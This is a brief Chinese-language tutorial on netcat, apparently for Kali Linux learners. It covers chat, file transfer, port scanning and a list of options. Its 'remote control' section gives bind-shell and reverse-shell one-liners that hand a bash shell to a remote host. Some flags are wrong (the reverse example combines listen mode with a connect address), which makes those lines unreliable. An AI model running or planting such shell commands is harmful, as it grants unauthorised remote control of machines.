Netcat(Linux下NC命令)主要用途:
1.扫描制定ip端口情况。
2.端口监听,端口转发。
3.提交自定义数据包。
4.远程控制。
1.netcat 传输文本信息
kali pc1: 作为服务端,先打开端口,例如333号端口,代码如下:
nc -lp 333
kali pc2:作为客户端,打开对应端口,并连接对方IP地址:
nc -nv (server ip) 333
2.netcat 传输文件
pc1:作为服务机,先打开端口,例如333号,然后将文件重定向:
nc -l -p 333 > lsof.txt
pc2:作为客户机,将传输过来的文件写入:
lsof | nc -nc 192.168.170.131 333 -q 1.
3.端口扫描
nc -vnzu (ip address) 端口号
4.远程控制(重点)(控制为双向的)
正向:
A:
nc -lp 333 -c bash
相当于打开 333号端口
B:
nc 1.1.1.1 333
相当于连接333号端口,此时B控制A。
反向:
A:
nc -lp 333
B:
nc -lp 1.1.1.1 333 -c bash
主要参数:
options:
-d 无命令行界面,使用后台模式
-e prog 程序重定向 [危险!!]
-g gateway 源路由跳跃点, 不超过8
-G num 源路由指示器: 4, 8, 12, ...
-h 获取帮助信息
-i secs 延时设置,端口扫描时使用
-l 监听入站信息
-L 监听知道NetCat被结束(可断开重连)
-n 以数字形式表示的IP地址
-o file 使进制记录
-p port 打开本地端口
-r 随机本地和远程的端口
-s addr 本地源地址
-t 以TELNET的形式应答入站请求
-u UDP 模式
-v 显示详细信息 [使用=vv获取更详细的信息]
-w secs 连接超时设置
-z I/O 模式 [扫描时使用]
端口号可以是单个的或者存在一个范围: m-n [包含值]。
